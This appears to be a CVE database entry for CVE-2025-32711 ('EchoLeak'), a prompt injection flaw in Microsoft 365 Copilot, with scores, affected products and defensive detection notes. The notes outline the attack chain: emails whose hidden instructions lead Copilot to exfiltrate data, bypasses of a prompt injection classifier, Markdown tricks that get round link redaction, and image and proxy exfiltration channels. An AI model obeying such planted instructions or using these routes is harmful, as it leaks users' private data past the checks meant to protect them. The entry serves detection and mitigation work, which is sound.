cbcvebase.
CVE-2025-32711
published 2025-06-11

CVE-2025-32711: Ai command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.

PriorityP354high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
5.78%
92.2th percentile
Ai command injection in M365 Copilot allows an unauthorized attacker to disclose information over a network.

Affected

2 ranges
VendorProductVersion rangeFixed in
microsoftmicrosoft_365_copilot
msrcmicrosoft_365_copilot

Detection & IOCsextracted from sources · hover to see the quote

otherreference-style Markdown used to circumvent link redaction
otherMicrosoft Teams proxy abused via content security policy allowance for data exfiltration
otherauto-fetched images exploited as exfiltration channel
  • Inspect Copilot prompt and response traffic for reference-style Markdown link patterns that may be used to bypass link redaction controls and smuggle exfiltration URLs.
  • Alert on Copilot responses that include outbound requests to Microsoft Teams proxy endpoints not initiated by direct user action, as this was the exfiltration channel leveraged in EchoLeak.
  • Use NLP-based email intent analysis to flag emails whose content, when parsed as instructions, would direct an AI assistant to exfiltrate data—even if the email appears benign to human readers.
  • Monitor for XPIA (Cross Prompt Injection Attempt) classifier evasion patterns in emails processed by M365 Copilot, as EchoLeak specifically chained bypasses of Microsoft's XPIA classifier.
  • ·Microsoft patched EchoLeak server-side in May 2025; no customer action is required for the patch itself, but configuration hardening is still recommended.
  • ·Disabling external email context in Copilot settings is a recommended mitigation to reduce the RAG attack surface for this class of prompt injection.
  • ·Restricting markdown rendering in AI outputs reduces the prompt injection risk surface, particularly for reference-style Markdown link exfiltration.
  • ·Existing defenses (e.g., retrieval filtering) are insufficient to prevent retrieval of optimized malicious text; adaptive attack variants can bypass them.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vendor_msrc9.3CRITICAL
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.